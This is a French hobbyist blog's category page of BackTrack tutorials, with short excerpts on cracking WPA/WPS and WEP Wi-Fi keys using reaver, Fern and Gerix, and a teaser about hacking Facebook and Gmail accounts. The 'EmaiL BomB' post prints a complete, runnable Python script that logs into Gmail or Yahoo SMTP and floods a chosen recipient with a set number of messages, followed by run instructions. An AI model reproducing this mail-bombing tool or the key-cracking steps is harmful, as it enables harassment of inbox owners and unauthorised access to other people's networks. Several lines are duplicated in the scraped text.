backtrack - tuto-informatique.seb30.overblog.com
Overblog Suivre ce blog
Administration Créer mon blog
tuto-informatique.seb30.overblog.com

tuto et astuce informatique,n'hesitez pas a faire un don pour le travail

Articles avec #backtrack catégorie

reaver pour cle wpa wps(2eme partie application)

Publié le 25 Novembre 2013 par SEB dans backtrack

pour voir si reaver est installé taper reaver dans votre terminal ,cette page vous montrera toutes les options possible avec reaver

pour voir si reaver est installé taper reaver dans votre terminal ,cette page vous montrera toutes les options possible avec reaver

pour mettre votre carte en monitoring ouvrez votre terminal et tapez ceci    airmon-ng start wlan0

pour mettre votre carte en monitoring ouvrez votre terminal et tapez ceci airmon-ng start wlan0

Lire la suite

reaver pour cle wpa wps(1ere partie installation)

Publié le 7 Août 2013 par SEB dans backtrack

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Lire la suite

craquer cle wpa psk(wps) avec fern facilement

Publié le 27 Juillet 2013 par SEB dans backtrack

ouvrer le menu Backtrack > Exploitation Tools > Wireless Exploitation Tools >WLAN Exploitation >Fern-wifi-cracker

ensuite selectionnez votre carte wifi afin de la passer en monitoring ,puis activer la recherche ,alors des cle wep et wpa apparaisent suivant les reseaux que vous capter

ensuite selectionnez votre carte wifi afin de la passer en monitoring ,puis activer la recherche ,alors des cle wep et wpa apparaisent suivant les reseaux que vous capter

Lire la suite

mise a jour bactrack 5

Publié le 26 Juin 2013 par SEB dans backtrack

mise a jour bactrack 5
tapez y pour continuer la procedure

tapez y pour continuer la procedure

Lire la suite

craquer cle wep avec gerix facilement

Publié le 25 Juin 2013 par SEB dans backtrack

Il est installé par défaut sur Backtrack 5 BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng
Il est installé par défaut sur Backtrack 5 BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng

Il est installé par défaut sur Backtrack 5 BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng

Dans le principe, c'est toujours pareil, rendez vous dans l'onglet "Configuration" pour passer votre carte réseau qui va bien en mode "monitor" (Enable/Disable Monitor Mode)
Dans le principe, c'est toujours pareil, rendez vous dans l'onglet "Configuration" pour passer votre carte réseau qui va bien en mode "monitor" (Enable/Disable Monitor Mode)

Dans le principe, c'est toujours pareil, rendez vous dans l'onglet "Configuration" pour passer votre carte réseau qui va bien en mode "monitor" (Enable/Disable Monitor Mode)

Lire la suite

EmaiL BomB

Publié le 25 Juin 2013 par SEB dans backtrack

EmaiL BomB

aujourd'hui je vais vous montrer comment monter un email bomb sur bactrack en pyton


Si vous voulez le tester:

#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')


to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
smtp_server = 'smtp.gmail.com'
port = 587
elif server == 'yahoo':
smtp_server = 'smtp.mail.yahoo.com'
port = 25
else:
print 'Applies only to gmail and yahoo.'
sys.exit()

print ''

try:
server = smtplib.SMTP(smtp_server,port)
server.ehlo()
if smtp_server == "smtp.gmail.com":
server.starttls()
server.login(user,passwd)
for i in range(1, total+1):
subject = os.urandom(9)
msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
server.sendmail(user,to,msg)
print "\rTotal emails sent: %i" % i
sys.stdout.flush()
server.quit()
print '\n Done !!!'
except KeyboardInterrupt:
print '[-] Canceled'
sys.exit()
except smtplib.SMTPAuthenticationError:
print '\n[!] The username or password you entered is incorrect.'
sys.exit()



Copier le script dans un fichier txt, enregistrer et renommer le "emailbomb.py"

Rendez le executable:

chmod +x emailbomb.py

Et on l'exécute:

python emailbomb.py

linux track

Lire la suite

HACKING FACEBOOK, COMPTE GMAIL EN UTILISANT BACKTRACK

Publié le 17 Avril 2013 par SEB dans backtrack

Lire la suite